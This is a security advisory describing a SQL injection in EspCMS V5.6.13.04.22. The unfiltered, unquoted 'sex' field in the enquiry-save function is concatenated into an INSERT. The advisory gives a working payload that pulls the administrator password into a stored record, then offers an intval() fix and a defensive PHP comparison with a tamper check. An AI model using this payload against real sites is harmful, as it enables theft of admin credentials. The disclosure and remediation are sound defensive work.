EspCMS V5.6.13.04.22: a SQL injection vulnerability exists in the official UTF-8 release, allowing the administrator account and password to be obtained.
In the file \interface\enquiry.php:
    function in_enquirysave() {
        parent::start_pagetemplate();
        $this->fun->formpathver();
        $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
        if ($this->CON['is_enquiry_memclass']) {
            parent::member_purview(0, $this->get_link('enabley', array(), admin_LNG));
        }
        $cartid = $this->fun->eccode($this->fun->accept('ecisp_enquiry_list', 'C'), 'decode', db_pscode);
        $cartid = stripslashes(htmlspecialchars_decode($cartid));
        $uncartid = !empty($cartid) ? unserialize($cartid) : 0;
        $userid = intval($this->fun->accept('userid', 'P'));   // cast to an integer
        $userid = !empty($userid) ? $userid : 0;
        $linkman = trim($this->fun->accept('linkman', 'P', true, true));
        $email = $this->fun->accept('email', 'P');
        $sex = $this->fun->accept('sex', 'P');                  // no cast, no quoting
        $sex = empty($sex) ? 0 : $sex;

The $sex variable is not filtered with intval(), and in the SQL statement that follows it is not enclosed in single quotes, so it is concatenated into the query exactly as received.

        // ... (the remaining field variables are read in the same way; elided in this excerpt)
        $db_field = 'enquirysn,userid,linkman,sex,country,province,city,district,address,zipcode,tel,fax,mobile,email,content,isclass,addtime,edittime';
        $db_values = "'$enquirysn',$userid,'$linkman',$sex,$country,$province,$city,$district,'$address','$zipcode','$tel','$fax','$mobile','$email','$content',0,$addtime,0";
        $this->db->query('INSERT INTO ' . $db_table . ' (' . $db_field . ') VALUES (' . $db_values . ')');
    }
Modify the sex value as follows:
    sex=,(select password from espcms_admin_member limit 1),1368528987,0)%23
The administrator password is then inserted into the record's email field:
Solution:
Filter $sex with intval() before it is used in the query.
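As an added illustration (not EspCMS's own code), the relevant part of the enquiry INSERT rebuilt with the request values stubbed in a $post array, so the unfiltered and the intval()-cast handling of sex can be compared, plus a check that flags a request whose integer field does not survive the cast; the table name, the $post array and the hostile sample value are assumptions:

```php
<?php
// Added example, not EspCMS code. $post stands in for the values that
// $this->fun->accept(..., 'P') returns; the table name is an assumed placeholder.
$db_table = 'espcms_enquiry_placeholder';

// Mirrors the original: userid is cast, sex is embedded unquoted and uncast.
function build_insert_vulnerable(array $post, string $table): string {
    $userid = intval($post['userid'] ?? 0);
    $sex    = empty($post['sex']) ? 0 : $post['sex'];
    return "INSERT INTO $table (userid,sex) VALUES ($userid,$sex)";
}

// The fix from the advisory: every unquoted numeric column goes through intval(),
// so only an integer literal can ever reach the query string.
function build_insert_fixed(array $post, string $table): string {
    $userid = intval($post['userid'] ?? 0);
    $sex    = intval($post['sex'] ?? 0);
    return "INSERT INTO $table (userid,sex) VALUES ($userid,$sex)";
}

// Detection helper: a value meant for an integer column that changes under the
// cast was not sent by the normal form and is worth logging before the insert.
function is_tampered_int(?string $raw): bool {
    if ($raw === null || trim($raw) === '') {
        return false;
    }
    return (string) intval($raw) !== trim($raw);
}

// Constructed requests: one benign, one carrying a non-integer sex value.
$benign  = ['userid' => '7', 'sex' => '1'];
$hostile = ['userid' => '7', 'sex' => '1,(select 1)'];

echo build_insert_vulnerable($hostile, $db_table), PHP_EOL; // extra value reaches the SQL
echo build_insert_fixed($hostile, $db_table), PHP_EOL;      // sex collapses to the integer 1
var_dump(is_tampered_int($benign['sex']));
var_dump(is_tampered_int($hostile['sex']));
```

Casting fixes this specific column; the quoted string columns in the same statement still rely on whatever escaping accept() applies, so a prepared statement for the whole INSERT is the more complete remedy.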